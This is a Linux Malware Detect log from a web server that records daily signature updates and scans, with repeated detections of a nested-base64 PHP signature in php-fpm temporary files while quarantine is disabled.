Dec 30 2025 04:09:28 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_69539ffb0ca7f.php
Dec 30 2025 04:09:28 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_69533bb776f2f.php
Dec 30 2025 04:09:28 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_69539e96a5fdb.php
Dec 30 2025 04:09:28 web1 maldet(122513): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 891, malware hits 32, cleaned hits 0, time 49s
Dec 30 2025 04:09:28 web1 maldet(122513): {scan} scan report saved, to view run: maldet --report 251230-0408.122513
Dec 30 2025 04:09:28 web1 maldet(122513): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 251230-0408.122513
Dec 31 2025 04:10:35 web1 maldet(555515): {update} checking for available updates...
Dec 31 2025 04:10:35 web1 maldet(555515): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Dec 31 2025 04:10:36 web1 maldet(555515): {update} hashing install files and checking against server...
Dec 31 2025 04:10:36 web1 maldet(555515): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Dec 31 2025 04:10:36 web1 maldet(555515): {update} latest version already installed.
Dec 31 2025 04:10:36 web1 maldet(555624): {sigup} performing signature update check...
Dec 31 2025 04:10:36 web1 maldet(555624): {sigup} local signature set is version 202512281244183
Dec 31 2025 04:10:36 web1 maldet(555624): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Dec 31 2025 04:10:36 web1 maldet(555624): {sigup} new signature set 202512312207256 available
Dec 31 2025 04:10:36 web1 maldet(555624): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Dec 31 2025 04:10:36 web1 maldet(555624): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Dec 31 2025 04:10:36 web1 maldet(555624): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz.md5
Dec 31 2025 04:10:36 web1 maldet(555624): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Dec 31 2025 04:10:36 web1 maldet(555624): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Dec 31 2025 04:10:37 web1 maldet(555624): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz.md5
Dec 31 2025 04:10:37 web1 maldet(555624): {sigup} verified md5sum of maldet-sigpack.tgz
Dec 31 2025 04:10:37 web1 maldet(555624): {sigup} unpacked and installed maldet-sigpack.tgz
Dec 31 2025 04:10:37 web1 maldet(555624): {sigup} verified md5sum of maldet-clean.tgz
Dec 31 2025 04:10:37 web1 maldet(555624): {sigup} unpacked and installed maldet-clean.tgz
Dec 31 2025 04:10:37 web1 maldet(555624): {sigup} signature set update completed
Dec 31 2025 04:10:37 web1 maldet(555624): {sigup} 17638 signatures (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Dec 31 2025 04:10:37 web1 maldet(555829): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Dec 31 2025 04:10:37 web1 maldet(555829): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Dec 31 2025 04:10:37 web1 maldet(555829): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Dec 31 2025 04:10:37 web1 maldet(555829): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Dec 31 2025 04:10:37 web1 maldet(555829): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Dec 31 2025 04:11:12 web1 maldet(555829): {scan} file list completed in 35s, found 978 files...
Dec 31 2025 04:11:12 web1 maldet(555829): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Dec 31 2025 04:11:12 web1 maldet(555829): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (978 files) in progress...
Dec 31 2025 04:11:35 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6954c85a5021f.php
Dec 31 2025 04:11:35 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_695460db7df30.php
Dec 31 2025 04:11:35 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6953fd710faef.php
Dec 31 2025 04:11:35 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6954657c22688.php
Dec 31 2025 04:11:35 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_695464b7604d7.php
Dec 31 2025 04:11:35 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6954c67c81643.php
Dec 31 2025 04:11:35 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6954607682a95.php
Dec 31 2025 04:11:35 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6954613dc102b.php
Dec 31 2025 04:11:35 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_695464f92c7e9.php
Dec 31 2025 04:11:35 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6954035432d23.php
Dec 31 2025 04:11:35 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6953fe5281c79.php
Dec 31 2025 04:11:35 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6953ff86d7c2a.php
Dec 31 2025 04:11:36 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6954c37d3b8bf.php
Dec 31 2025 04:11:36 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6954653b72f81.php
Dec 31 2025 04:11:36 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6953ff274cc23.php
Dec 31 2025 04:11:36 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6953febd26963.php
Dec 31 2025 04:11:36 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_695465f899346.php
Dec 31 2025 04:11:36 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6954601038dc0.php
Dec 31 2025 04:11:36 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6954c8113b5e0.php
Dec 31 2025 04:11:36 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_695465bad3aef.php
Dec 31 2025 04:11:36 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6954c85a5021f.php
Dec 31 2025 04:11:36 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_695460db7df30.php
Dec 31 2025 04:11:36 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6953fd710faef.php
Dec 31 2025 04:11:36 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6954657c22688.php
Dec 31 2025 04:11:36 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_695464b7604d7.php
Dec 31 2025 04:11:36 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6954c67c81643.php
Dec 31 2025 04:11:36 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6954607682a95.php
Dec 31 2025 04:11:36 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6954613dc102b.php
Dec 31 2025 04:11:36 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_695464f92c7e9.php
Dec 31 2025 04:11:36 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6954035432d23.php
Dec 31 2025 04:11:36 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6953fe5281c79.php
Dec 31 2025 04:11:36 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6953ff86d7c2a.php
Dec 31 2025 04:11:36 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6954c37d3b8bf.php
Dec 31 2025 04:11:36 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6954653b72f81.php
Dec 31 2025 04:11:36 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6953ff274cc23.php
Dec 31 2025 04:11:36 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6953febd26963.php
Dec 31 2025 04:11:36 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_695465f899346.php
Dec 31 2025 04:11:36 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6954601038dc0.php
Dec 31 2025 04:11:36 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6954c8113b5e0.php
Dec 31 2025 04:11:37 web1 maldet(555829): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_695465bad3aef.php
Dec 31 2025 04:11:37 web1 maldet(555829): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 978, malware hits 40, cleaned hits 0, time 60s
Dec 31 2025 04:11:37 web1 maldet(555829): {scan} scan report saved, to view run: maldet --report 251231-0410.555829
Dec 31 2025 04:11:37 web1 maldet(555829): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 251231-0410.555829
Dec 31 2025 10:44:33 web1 maldet(1161): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Jan 01 2026 04:16:48 web1 maldet(328741): {update} checking for available updates...
Jan 01 2026 04:16:49 web1 maldet(328741): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Jan 01 2026 04:16:49 web1 maldet(328741): {update} hashing install files and checking against server...
Jan 01 2026 04:16:49 web1 maldet(328741): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Jan 01 2026 04:16:49 web1 maldet(328741): {update} latest version already installed.
Jan 01 2026 04:16:49 web1 maldet(328850): {sigup} performing signature update check...
Jan 01 2026 04:16:49 web1 maldet(328850): {sigup} local signature set is version 202512312207256
Jan 01 2026 04:16:49 web1 maldet(328850): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Jan 01 2026 04:16:49 web1 maldet(328850): {sigup} new signature set 202601012945490 available
Jan 01 2026 04:16:49 web1 maldet(328850): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Jan 01 2026 04:16:49 web1 maldet(328850): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Jan 01 2026 04:16:49 web1 maldet(328850): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz.md5
Jan 01 2026 04:16:49 web1 maldet(328850): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Jan 01 2026 04:16:50 web1 maldet(328850): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Jan 01 2026 04:16:50 web1 maldet(328850): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz.md5
Jan 01 2026 04:16:50 web1 maldet(328850): {sigup} verified md5sum of maldet-sigpack.tgz
Jan 01 2026 04:16:50 web1 maldet(328850): {sigup} unpacked and installed maldet-sigpack.tgz
Jan 01 2026 04:16:50 web1 maldet(328850): {sigup} verified md5sum of maldet-clean.tgz
Jan 01 2026 04:16:50 web1 maldet(328850): {sigup} unpacked and installed maldet-clean.tgz
Jan 01 2026 04:16:50 web1 maldet(328850): {sigup} signature set update completed
Jan 01 2026 04:16:50 web1 maldet(328850): {sigup} 17638 signatures (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 01 2026 04:16:50 web1 maldet(329054): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Jan 01 2026 04:16:50 web1 maldet(329054): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 01 2026 04:16:50 web1 maldet(329054): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Jan 01 2026 04:16:50 web1 maldet(329054): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Jan 01 2026 04:16:50 web1 maldet(329054): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Jan 01 2026 04:17:22 web1 maldet(329054): {scan} file list completed in 32s, found 3312 files...
Jan 01 2026 04:17:22 web1 maldet(329054): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Jan 01 2026 04:17:22 web1 maldet(329054): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (3312 files) in progress...
Jan 01 2026 04:18:05 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6955277ee1dbb.php
Jan 01 2026 04:18:05 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_69552a10eb42d.php
Jan 01 2026 04:18:05 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6955290a6164f.php
Jan 01 2026 04:18:05 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_695527148d4ba.php
Jan 01 2026 04:18:05 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6955252ed8ddd.php
Jan 01 2026 04:18:05 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_695528ab1b36e.php
Jan 01 2026 04:18:05 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_695525a1e2a77.php
Jan 01 2026 04:18:05 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_69552a6485380.php
Jan 01 2026 04:18:05 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_69558ba0b9978.php
Jan 01 2026 04:18:05 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_6955ee4915200.php
Jan 01 2026 04:18:05 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_6955ec33ca1d6.php
Jan 01 2026 04:18:05 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_6955f01e1484e.php
Jan 01 2026 04:18:05 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_69558b4287dc1.php
Jan 01 2026 04:18:06 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_6955ebbfe0874.php
Jan 01 2026 04:18:06 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_6955899f9a0dd.php
Jan 01 2026 04:18:06 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_6955eea881589.php
Jan 01 2026 04:18:06 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_69558a0fedcfd.php
Jan 01 2026 04:18:06 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_6955efc7e6090.php
Jan 01 2026 04:18:06 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_69558e260ebdd.php
Jan 01 2026 04:18:06 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6955277ee1dbb.php
Jan 01 2026 04:18:06 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_69552a10eb42d.php
Jan 01 2026 04:18:06 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6955290a6164f.php
Jan 01 2026 04:18:06 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_695527148d4ba.php
Jan 01 2026 04:18:06 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_6955252ed8ddd.php
Jan 01 2026 04:18:06 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_695528ab1b36e.php
Jan 01 2026 04:18:06 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_695525a1e2a77.php
Jan 01 2026 04:18:06 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_69552a6485380.php
Jan 01 2026 04:18:06 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_69558ba0b9978.php
Jan 01 2026 04:18:06 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_6955ee4915200.php
Jan 01 2026 04:18:06 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_6955ec33ca1d6.php
Jan 01 2026 04:18:06 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_6955f01e1484e.php
Jan 01 2026 04:18:06 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_69558b4287dc1.php
Jan 01 2026 04:18:06 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_6955ebbfe0874.php
Jan 01 2026 04:18:06 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_6955899f9a0dd.php
Jan 01 2026 04:18:06 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_6955eea881589.php
Jan 01 2026 04:18:07 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_69558a0fedcfd.php
Jan 01 2026 04:18:07 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_6955efc7e6090.php
Jan 01 2026 04:18:07 web1 maldet(329054): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-19ebf25d9bc64c3d829c2a0dd5661288-ea-php83-php-fpm.service-zgTg0F/tmp/run_69558e260ebdd.php
Jan 01 2026 04:18:07 web1 maldet(329054): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 3312, malware hits 38, cleaned hits 0, time 77s
Jan 01 2026 04:18:07 web1 maldet(329054): {scan} scan report saved, to view run: maldet --report 260101-0416.329054
Jan 01 2026 04:18:07 web1 maldet(329054): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 260101-0416.329054
Jan 01 2026 18:07:03 web1 maldet(1195): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Jan 02 2026 04:31:58 web1 maldet(202126): {update} checking for available updates...
Jan 02 2026 04:31:58 web1 maldet(202126): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Jan 02 2026 04:31:58 web1 maldet(202126): {update} hashing install files and checking against server...
Jan 02 2026 04:31:58 web1 maldet(202126): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Jan 02 2026 04:31:58 web1 maldet(202126): {update} latest version already installed.
Jan 02 2026 04:31:58 web1 maldet(202235): {sigup} performing signature update check...
Jan 02 2026 04:31:58 web1 maldet(202235): {sigup} local signature set is version 202601012945490
Jan 02 2026 04:31:58 web1 maldet(202235): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Jan 02 2026 04:31:58 web1 maldet(202235): {sigup} latest signature set already installed
